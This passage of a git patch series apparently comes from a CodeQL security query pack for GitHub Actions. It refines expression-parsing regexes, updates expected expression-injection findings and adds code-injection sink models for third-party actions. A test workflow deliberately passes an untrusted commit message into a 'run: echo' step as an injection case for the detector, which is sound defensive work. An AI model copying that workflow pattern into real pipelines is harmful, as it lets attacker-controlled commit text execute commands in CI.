containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and - line.matches("%" + varname + "%") + exists(line.regexpFind(varname, _, _)) ) ) ) From 872b1f88f053dbb29a422f5fa0b33b3e0933a907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 13 Mar 2024 22:47:19 +0100 Subject: [PATCH 095/707] More regexp improvements --- ql/lib/codeql/actions/Ast.qll | 9 +++++---- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 ++-- ql/src/Debug/partial.ql | 1 + .../Security/CWE-094/.github/workflows/test.yml | 4 ++-- .../CWE-094/CriticalExpressionInjection.expected | 10 +++++----- .../Security/CWE-094/ExpressionInjection.expected | 10 +++++----- 6 files changed, 20 insertions(+), 18 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 3d675bebce02..143e89512fe5 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -5,10 +5,9 @@ module Utils { bindingset[expr] string normalizeExpr(string expr) { result = - expr.replaceAll("['", ".") - .replaceAll("']", "") - .replaceAll("[\"", ".") - .replaceAll("\"]", "") + //[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-] + expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1") + .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1") .regexpReplaceAll("\\s*\\.\\s*", ".") } } @@ -45,6 +44,8 @@ class Expression extends AstNode instanceof ExpressionImpl { string getExpression() { result = expression } string getRawExpression() { result = rawExpression } + + string getNormalizedExpression() { result = Utils::normalizeExpr(expression) } } /** A common class for `env` in workflow, job or step. */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7ebed407c0fd..b05dd852dbfe 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -30,8 +30,8 @@ string getASimpleReferenceExpression(YamlString s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9'\"_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } private newtype TAstNode = diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index fb31fe209902..702a454645c5 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -8,6 +8,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import PartialFlow::PartialPathGraph diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml index 628b6e6f1bf5..b9fa152e49ab 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml @@ -12,7 +12,7 @@ jobs: - id: step0 uses: mad9000/actions-find-and-replace-string@3 with: - source: ${{ github.event.head_commit.message }} + source: ${{ github.event['head_commit']['message'] }} find: 'foo' replace: '' - id: step1 @@ -34,4 +34,4 @@ jobs: needs: job1 steps: - - run: echo ${{needs.job1.outputs.job_output}} + - run: echo ${{needs.job1.outputs['job_output']}} diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 38884b3eaef4..dfed1edb40a2 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | @@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -254,7 +254,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 21a9978c54f8..d22e9833f521 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -44,10 +44,10 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | @@ -172,12 +172,12 @@ nodes | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -261,7 +261,7 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 446a2dc2673085a24960ad3f293e67f247d59cd5 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 096/707] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml | 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 000000000000..e3d97adf69d4 --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e7..cd409f38b59d 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ 